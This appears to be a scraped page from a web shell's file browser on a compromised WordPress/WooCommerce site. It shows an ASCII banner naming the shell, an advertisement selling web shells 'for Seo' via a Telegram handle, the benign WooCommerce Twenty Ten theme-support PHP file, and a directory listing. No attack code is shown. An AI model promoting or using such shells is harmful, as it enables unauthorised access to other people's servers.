__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Twenty Ten support.
*
* @since 3.3.0
* @package WooCommerce\Classes
*/
defined( 'ABSPATH' ) || exit;
/**
* WC_Twenty_Ten class.
*/
class WC_Twenty_Ten {
/**
* Theme init.
*/
public static function init() {
// Remove default wrappers.
remove_action( 'woocommerce_before_main_content', 'woocommerce_output_content_wrapper' );
remove_action( 'woocommerce_after_main_content', 'woocommerce_output_content_wrapper_end' );
// Add custom wrappers.
add_action( 'woocommerce_before_main_content', array( __CLASS__, 'output_content_wrapper' ) );
add_action( 'woocommerce_after_main_content', array( __CLASS__, 'output_content_wrapper_end' ) );
// Declare theme support for features.
add_theme_support( 'wc-product-gallery-zoom' );
add_theme_support( 'wc-product-gallery-lightbox' );
add_theme_support( 'wc-product-gallery-slider' );
add_theme_support(
'woocommerce',
array(
'thumbnail_image_width' => 200,
'single_image_width' => 300,
)
);
}
/**
* Open wrappers.
*/
public static function output_content_wrapper() {
echo '<div id="container"><div id="content" role="main">';
}
/**
* Close wrappers.
*/
public static function output_content_wrapper_end() {
echo '</div></div>';
}
}
WC_Twenty_Ten::init();
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| class-wc-twenty-eleven.php | File | 1.29 KB | 0664 |
|
| class-wc-twenty-fifteen.php | File | 1.36 KB | 0664 |
|
| class-wc-twenty-fourteen.php | File | 1.42 KB | 0664 |
|
| class-wc-twenty-nineteen.php | File | 3.57 KB | 0664 |
|
| class-wc-twenty-seventeen.php | File | 3.27 KB | 0664 |
|
| class-wc-twenty-sixteen.php | File | 1.33 KB | 0664 |
|
| class-wc-twenty-ten.php | File | 1.26 KB | 0664 |
|
| class-wc-twenty-thirteen.php | File | 1.37 KB | 0664 |
|
| class-wc-twenty-twelve.php | File | 1.68 KB | 0664 |
|
| class-wc-twenty-twenty-one.php | File | 2.15 KB | 0664 |
|
| class-wc-twenty-twenty-three.php | File | 1.96 KB | 0664 |
|
| class-wc-twenty-twenty-two.php | File | 1.95 KB | 0664 |
|
| class-wc-twenty-twenty.php | File | 2.81 KB | 0664 |
|